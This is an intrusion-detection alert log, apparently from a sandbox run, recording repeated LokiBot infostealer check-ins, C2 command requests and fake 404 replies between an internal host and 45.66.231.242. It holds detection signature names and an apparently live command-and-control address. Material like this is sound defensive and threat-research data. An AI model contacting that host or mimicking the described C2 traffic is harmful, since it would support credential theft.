2024-10-01T10:55:58.586844+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49791	45.66.231.242	80	TCP
2024-10-01T10:55:58.586844+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49791	45.66.231.242	80	TCP
2024-10-01T10:55:58.598040+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49791	TCP
2024-10-01T10:55:58.764642+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49792	45.66.231.242	80	TCP
2024-10-01T10:55:58.764642+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49792	45.66.231.242	80	TCP
2024-10-01T10:55:58.764642+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49792	45.66.231.242	80	TCP
2024-10-01T10:55:59.517374+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49792	45.66.231.242	80	TCP
2024-10-01T10:55:59.517374+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49792	45.66.231.242	80	TCP
2024-10-01T10:55:59.522201+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49792	TCP
2024-10-01T10:55:59.680645+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49793	45.66.231.242	80	TCP
2024-10-01T10:55:59.680645+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49793	45.66.231.242	80	TCP
2024-10-01T10:55:59.680645+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49793	45.66.231.242	80	TCP
2024-10-01T10:56:00.358622+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49793	45.66.231.242	80	TCP
2024-10-01T10:56:00.358622+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49793	45.66.231.242	80	TCP
2024-10-01T10:56:00.363531+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49793	TCP
2024-10-01T10:56:00.513321+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49794	45.66.231.242	80	TCP
2024-10-01T10:56:00.513321+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49794	45.66.231.242	80	TCP
2024-10-01T10:56:00.513321+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49794	45.66.231.242	80	TCP
2024-10-01T10:56:10.260937+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49794	45.66.231.242	80	TCP
2024-10-01T10:56:10.260937+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49794	45.66.231.242	80	TCP
2024-10-01T10:56:10.265824+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49794	TCP
2024-10-01T10:56:10.439429+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49795	45.66.231.242	80	TCP
2024-10-01T10:56:10.439429+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49795	45.66.231.242	80	TCP
2024-10-01T10:56:10.439429+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49795	45.66.231.242	80	TCP
2024-10-01T10:56:11.179166+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49795	45.66.231.242	80	TCP
2024-10-01T10:56:11.179166+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49795	45.66.231.242	80	TCP
2024-10-01T10:56:11.184005+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49795	TCP
2024-10-01T10:56:11.353855+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49796	45.66.231.242	80	TCP
2024-10-01T10:56:11.353855+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49796	45.66.231.242	80	TCP
2024-10-01T10:56:11.353855+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49796	45.66.231.242	80	TCP
2024-10-01T10:56:12.004600+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49796	45.66.231.242	80	TCP
2024-10-01T10:56:12.004600+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49796	45.66.231.242	80	TCP
2024-10-01T10:56:12.009437+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49796	TCP
2024-10-01T10:56:12.182284+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49797	45.66.231.242	80	TCP
2024-10-01T10:56:12.182284+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49797	45.66.231.242	80	TCP
2024-10-01T10:56:12.182284+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49797	45.66.231.242	80	TCP
2024-10-01T10:56:12.873678+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49797	45.66.231.242	80	TCP
2024-10-01T10:56:12.873678+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49797	45.66.231.242	80	TCP
2024-10-01T10:56:13.048624+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49798	45.66.231.242	80	TCP
2024-10-01T10:56:13.048624+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49798	45.66.231.242	80	TCP
2024-10-01T10:56:13.048624+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49798	45.66.231.242	80	TCP
2024-10-01T10:56:13.732989+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49798	45.66.231.242	80	TCP
2024-10-01T10:56:13.732989+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49798	45.66.231.242	80	TCP
2024-10-01T10:56:13.740120+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49798	TCP
2024-10-01T10:56:13.911144+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49799	45.66.231.242	80	TCP
2024-10-01T10:56:13.911144+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49799	45.66.231.242	80	TCP
2024-10-01T10:56:13.911144+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49799	45.66.231.242	80	TCP
2024-10-01T10:56:14.662421+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49799	45.66.231.242	80	TCP
2024-10-01T10:56:14.662421+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49799	45.66.231.242	80	TCP
2024-10-01T10:56:14.668285+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49799	TCP
2024-10-01T10:56:14.813722+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49800	45.66.231.242	80	TCP
2024-10-01T10:56:14.813722+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49800	45.66.231.242	80	TCP
2024-10-01T10:56:14.813722+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49800	45.66.231.242	80	TCP
2024-10-01T10:56:15.549540+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49800	45.66.231.242	80	TCP
2024-10-01T10:56:15.549540+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49800	45.66.231.242	80	TCP
2024-10-01T10:56:15.557520+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49800	TCP
2024-10-01T10:56:15.707475+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49801	45.66.231.242	80	TCP
2024-10-01T10:56:15.707475+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49801	45.66.231.242	80	TCP
2024-10-01T10:56:15.707475+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49801	45.66.231.242	80	TCP
2024-10-01T10:56:16.583958+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49801	45.66.231.242	80	TCP
2024-10-01T10:56:16.583958+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49801	45.66.231.242	80	TCP
2024-10-01T10:56:16.590966+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49801	TCP
2024-10-01T10:56:16.758460+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49802	45.66.231.242	80	TCP
2024-10-01T10:56:16.758460+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49802	45.66.231.242	80	TCP
2024-10-01T10:56:16.758460+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49802	45.66.231.242	80	TCP
2024-10-01T10:56:17.494274+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49802	45.66.231.242	80	TCP
2024-10-01T10:56:17.494274+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49802	45.66.231.242	80	TCP
2024-10-01T10:56:17.501549+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49802	TCP
2024-10-01T10:56:17.789425+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49803	45.66.231.242	80	TCP
2024-10-01T10:56:17.789425+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49803	45.66.231.242	80	TCP
2024-10-01T10:56:17.789425+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49803	45.66.231.242	80	TCP
2024-10-01T10:56:21.570507+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49803	45.66.231.242	80	TCP
2024-10-01T10:56:21.570507+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49803	45.66.231.242	80	TCP
2024-10-01T10:56:21.575286+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49803	TCP
2024-10-01T10:56:21.729047+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49804	45.66.231.242	80	TCP
2024-10-01T10:56:21.729047+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49804	45.66.231.242	80	TCP
2024-10-01T10:56:21.729047+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49804	45.66.231.242	80	TCP
2024-10-01T10:56:22.785811+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49804	45.66.231.242	80	TCP
2024-10-01T10:56:22.785811+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49804	45.66.231.242	80	TCP
2024-10-01T10:56:22.790596+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49804	TCP
2024-10-01T10:56:22.932407+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49805	45.66.231.242	80	TCP
2024-10-01T10:56:22.932407+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49805	45.66.231.242	80	TCP
2024-10-01T10:56:22.932407+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49805	45.66.231.242	80	TCP
2024-10-01T10:56:23.757565+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49805	45.66.231.242	80	TCP
2024-10-01T10:56:23.757565+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49805	45.66.231.242	80	TCP
2024-10-01T10:56:23.762391+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49805	TCP
2024-10-01T10:56:23.914707+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49806	45.66.231.242	80	TCP
2024-10-01T10:56:23.914707+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49806	45.66.231.242	80	TCP
2024-10-01T10:56:23.914707+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49806	45.66.231.242	80	TCP
2024-10-01T10:56:27.643202+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49806	45.66.231.242	80	TCP
2024-10-01T10:56:27.643202+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49806	45.66.231.242	80	TCP
2024-10-01T10:56:27.648158+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49806	TCP
2024-10-01T10:56:27.790640+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49807	45.66.231.242	80	TCP
2024-10-01T10:56:27.790640+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49807	45.66.231.242	80	TCP
2024-10-01T10:56:27.790640+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49807	45.66.231.242	80	TCP
2024-10-01T10:56:28.562142+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49807	45.66.231.242	80	TCP
2024-10-01T10:56:28.562142+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49807	45.66.231.242	80	TCP
2024-10-01T10:56:28.566911+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49807	TCP
2024-10-01T10:56:28.717307+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49808	45.66.231.242	80	TCP
2024-10-01T10:56:28.717307+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49808	45.66.231.242	80	TCP
2024-10-01T10:56:28.717307+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49808	45.66.231.242	80	TCP
2024-10-01T10:56:29.397053+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49808	45.66.231.242	80	TCP
2024-10-01T10:56:29.397053+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49808	45.66.231.242	80	TCP
2024-10-01T10:56:29.402143+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49808	TCP
2024-10-01T10:56:29.548372+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49809	45.66.231.242	80	TCP
2024-10-01T10:56:29.548372+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49809	45.66.231.242	80	TCP
2024-10-01T10:56:29.548372+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49809	45.66.231.242	80	TCP
2024-10-01T10:56:30.238349+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49809	45.66.231.242	80	TCP
2024-10-01T10:56:30.238349+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49809	45.66.231.242	80	TCP
2024-10-01T10:56:30.243287+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49809	TCP
2024-10-01T10:56:30.403711+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49810	45.66.231.242	80	TCP
2024-10-01T10:56:30.403711+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49810	45.66.231.242	80	TCP
2024-10-01T10:56:30.403711+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49810	45.66.231.242	80	TCP
2024-10-01T10:56:31.057616+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49810	45.66.231.242	80	TCP
2024-10-01T10:56:31.057616+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49810	45.66.231.242	80	TCP
2024-10-01T10:56:31.101297+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49810	TCP
2024-10-01T10:56:31.360698+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49811	45.66.231.242	80	TCP
2024-10-01T10:56:31.360698+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49811	45.66.231.242	80	TCP
2024-10-01T10:56:31.360698+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49811	45.66.231.242	80	TCP
2024-10-01T10:56:32.074355+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49811	45.66.231.242	80	TCP
2024-10-01T10:56:32.074355+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49811	45.66.231.242	80	TCP
2024-10-01T10:56:32.079313+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49811	TCP
2024-10-01T10:56:32.244487+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49812	45.66.231.242	80	TCP
2024-10-01T10:56:32.244487+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49812	45.66.231.242	80	TCP
2024-10-01T10:56:32.244487+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49812	45.66.231.242	80	TCP
2024-10-01T10:56:32.917597+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49812	45.66.231.242	80	TCP
2024-10-01T10:56:32.917597+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49812	45.66.231.242	80	TCP
2024-10-01T10:56:32.922481+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49812	TCP
2024-10-01T10:56:33.078751+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49813	45.66.231.242	80	TCP
2024-10-01T10:56:33.078751+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49813	45.66.231.242	80	TCP
2024-10-01T10:56:33.078751+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49813	45.66.231.242	80	TCP
2024-10-01T10:56:33.794817+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49813	45.66.231.242	80	TCP
2024-10-01T10:56:33.794817+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49813	45.66.231.242	80	TCP
2024-10-01T10:56:33.845002+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49813	TCP
2024-10-01T10:56:34.264055+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49814	45.66.231.242	80	TCP
2024-10-01T10:56:34.264055+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49814	45.66.231.242	80	TCP
2024-10-01T10:56:34.264055+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49814	45.66.231.242	80	TCP
2024-10-01T10:56:34.954399+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49814	45.66.231.242	80	TCP
2024-10-01T10:56:34.954399+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49814	45.66.231.242	80	TCP
2024-10-01T10:56:34.959453+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49814	TCP
2024-10-01T10:56:35.118822+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49815	45.66.231.242	80	TCP
2024-10-01T10:56:35.118822+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49815	45.66.231.242	80	TCP
2024-10-01T10:56:35.118822+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49815	45.66.231.242	80	TCP
2024-10-01T10:56:35.847108+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49815	45.66.231.242	80	TCP
2024-10-01T10:56:35.847108+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49815	45.66.231.242	80	TCP
2024-10-01T10:56:35.853992+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49815	TCP
2024-10-01T10:56:36.007121+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49816	45.66.231.242	80	TCP
2024-10-01T10:56:36.007121+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49816	45.66.231.242	80	TCP
2024-10-01T10:56:36.007121+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49816	45.66.231.242	80	TCP
2024-10-01T10:56:36.897917+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49816	45.66.231.242	80	TCP
2024-10-01T10:56:36.897917+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49816	45.66.231.242	80	TCP
2024-10-01T10:56:36.903028+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49816	TCP
2024-10-01T10:56:37.076989+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49817	45.66.231.242	80	TCP
2024-10-01T10:56:37.076989+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49817	45.66.231.242	80	TCP
2024-10-01T10:56:37.076989+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49817	45.66.231.242	80	TCP
2024-10-01T10:56:37.827181+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49817	45.66.231.242	80	TCP
2024-10-01T10:56:37.827181+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49817	45.66.231.242	80	TCP
2024-10-01T10:56:37.832349+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49817	TCP
2024-10-01T10:56:37.993838+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49818	45.66.231.242	80	TCP
2024-10-01T10:56:37.993838+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49818	45.66.231.242	80	TCP
2024-10-01T10:56:37.993838+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49818	45.66.231.242	80	TCP
2024-10-01T10:56:38.657817+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49818	45.66.231.242	80	TCP
2024-10-01T10:56:38.657817+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49818	45.66.231.242	80	TCP
2024-10-01T10:56:38.662708+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49818	TCP
2024-10-01T10:56:38.817577+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49819	45.66.231.242	80	TCP
2024-10-01T10:56:38.817577+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49819	45.66.231.242	80	TCP
2024-10-01T10:56:38.817577+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49819	45.66.231.242	80	TCP
2024-10-01T10:56:39.503641+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49819	45.66.231.242	80	TCP
2024-10-01T10:56:39.503641+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49819	45.66.231.242	80	TCP
2024-10-01T10:56:39.508520+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49819	TCP
2024-10-01T10:56:39.675484+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49820	45.66.231.242	80	TCP
2024-10-01T10:56:39.675484+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49820	45.66.231.242	80	TCP
2024-10-01T10:56:39.675484+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49820	45.66.231.242	80	TCP
2024-10-01T10:56:40.380881+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49820	45.66.231.242	80	TCP
2024-10-01T10:56:40.380881+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49820	45.66.231.242	80	TCP
2024-10-01T10:56:40.385790+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49820	TCP
2024-10-01T10:56:40.543640+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49821	45.66.231.242	80	TCP
2024-10-01T10:56:40.543640+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49821	45.66.231.242	80	TCP
2024-10-01T10:56:40.543640+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49821	45.66.231.242	80	TCP
2024-10-01T10:56:41.310664+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49821	45.66.231.242	80	TCP
2024-10-01T10:56:41.310664+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49821	45.66.231.242	80	TCP
2024-10-01T10:56:41.315506+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49821	TCP
2024-10-01T10:56:41.469900+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49822	45.66.231.242	80	TCP
2024-10-01T10:56:41.469900+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49822	45.66.231.242	80	TCP
2024-10-01T10:56:41.469900+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49822	45.66.231.242	80	TCP
2024-10-01T10:56:42.196431+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49822	45.66.231.242	80	TCP
2024-10-01T10:56:42.196431+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49822	45.66.231.242	80	TCP
2024-10-01T10:56:42.201279+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49822	TCP
2024-10-01T10:56:42.355681+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49823	45.66.231.242	80	TCP
2024-10-01T10:56:42.355681+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49823	45.66.231.242	80	TCP
2024-10-01T10:56:42.355681+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49823	45.66.231.242	80	TCP
2024-10-01T10:56:43.188728+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49823	45.66.231.242	80	TCP
2024-10-01T10:56:43.188728+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49823	45.66.231.242	80	TCP
2024-10-01T10:56:43.193663+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49823	TCP
2024-10-01T10:56:43.346923+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49824	45.66.231.242	80	TCP
2024-10-01T10:56:43.346923+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49824	45.66.231.242	80	TCP
2024-10-01T10:56:43.346923+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49824	45.66.231.242	80	TCP
2024-10-01T10:56:44.087856+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49824	45.66.231.242	80	TCP
2024-10-01T10:56:44.087856+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49824	45.66.231.242	80	TCP
2024-10-01T10:56:44.092775+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	45.66.231.242	80	192.168.2.4	49824	TCP
2024-10-01T10:56:44.250217+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49825	45.66.231.242	80	TCP
2024-10-01T10:56:44.250217+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49825	45.66.231.242	80	TCP
2024-10-01T10:56:44.250217+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49825	45.66.231.242	80	TCP
